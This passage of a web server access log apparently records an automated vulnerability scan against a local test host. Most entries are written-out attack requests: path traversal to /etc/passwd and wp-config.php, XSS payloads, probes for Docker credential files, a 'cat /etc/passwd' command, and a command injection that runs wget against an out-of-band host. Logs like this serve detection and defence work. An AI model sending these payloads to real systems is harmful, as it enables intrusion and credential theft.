+0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nuxeo/login.jsp/pwn$%7B31333333330+7%7D.xhtml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /PRTG/index.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /site_cg/application/configs/application.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /backup2.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /base_import/static/c:/windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ckeditor/samples/sample_posteddata.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?p=%3Cimg%20src%20onerror=alert(/XSS/)%3E&debug_url=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /routes/error_log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dashboard/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /common/admin/Jobs2/Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php?href=../../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVersion HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_webtv&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?{alert(1)} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cdn-cgi/image/width/https://c9v8gc8smpv8b0ng0t00ot8rzomy88wqj.oast.online HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openam/ui/PWResetUserValidation HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"submit-url=%2Fsyscmd.htm&sysCmdselect=5&sysCmdselects=0&save_apply=Run+Command&sysCmd=wget+http://c9v8gc8smpv8b0ng0t001o585nhw5ir4d.oast.online","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /boafrm/formSysCmd HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /slr/application/configs/application.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=feedwordpress%2Fsyndication.php&visibility=%22%3E%3Cimg+src%3D2+onerror%3Dalert%28document.domain%29%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /web/static/c:/windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /editor/ckeditor/samples/sample_posteddata.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /php/passport/index.php?action=manage&mtype=userset&backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.dockercfg HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql.tar.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config/error_log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"new_login_session_management=1&languageChoice=1&authUser=admin&clearPass=pass&languageChoice=10","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /interface/main/main_screen.php?auth=login&site=default HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /AsiCommon/Controls/ContentManagement/ContentDesigner/Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /adjuncts/3a890183/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mod/jitsi/sessionpriv.php?avatar=https%3A%2F%2F127.0.0.1%2Fuser%2Fpix.php%2F498%2Ff1.jpg&nom=test_user%27)%3balert(document.domain)%3b//&ses=test_user&t=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/MBeanServerId HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"--8ce4b16b22b58894aa86c421e8759df3\x0D\x0AContent-Disposition: form-data; name=\x22jarfile\x22;filename=\x22poc.jar\x22\x0D\x0AContent-Type:application/octet-stream\x0D\x0A\x0D\x0A 297MFgwTFnBuVhPvD0cewu6o3ix\x0D\x0A--8ce4b16b22b58894aa86c421e8759df3--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /jars/upload HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Dockerrun.aws.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Default.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /OpenAM-11.0.0/ui/PWResetUserValidation HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /password.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"form_id=user_login&name={{username}}&pass={{password}}&op=Log+in","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /?q=user%2Flogin HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"cmd=cat /etc/passwd\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /debug.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /go/add-on/business-continuity/api/cipher.aes HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /base/static/c:/windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fck/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /passport/index.php?action=manage&mtype=userset&backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"","request":"GET /etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.docker/config.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.7z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /error_log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /owncloud/config/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /common/admin/Calendar/Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"{\x22query\x22:\x22query {\x5Cn nuclei1:__typename \x5Cn nuclei2:__typename \x5Cn nuclei3:__typename \x5Cn nuclei4:__typename \x5Cn nuclei5:__typename \x5Cn nuclei6:__typename \x5Cn }\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationName HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jnoj/web/polygon/problem/viewfile?id=1&name=../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.json.;%0aa.css?p.hits=full&property=rep:authorizableId&type=rep:User HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ui/PWResetUserValidation HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sap/bc/gui/sap/its/webgui HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"html_element_selection=\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /wlmeng/../../../../../../../../../../../etc/passwd%00index.htm HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/weathermap/editor.php?plug=0&mapname=poc.conf&action=set_map_properties¶m=¶m2=&debug=existing&node_name=&node_x=&node_y=&node_new_name=&node_label=&node_infourl=&node_hover=&node_iconfilename=--NONE--&link_name=&link_bandwidth_in=&link_bandwidth_out=&link_target=&link_width=&link_infourl=&link_hover=&map_title=46ea1712d4b13b55b3f680cc5b8b54e8&map_legend=Traffic+Load&map_stamp=Created:+%b+%d+%Y+%H:%M:%S&map_linkdefaultwidth=7 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 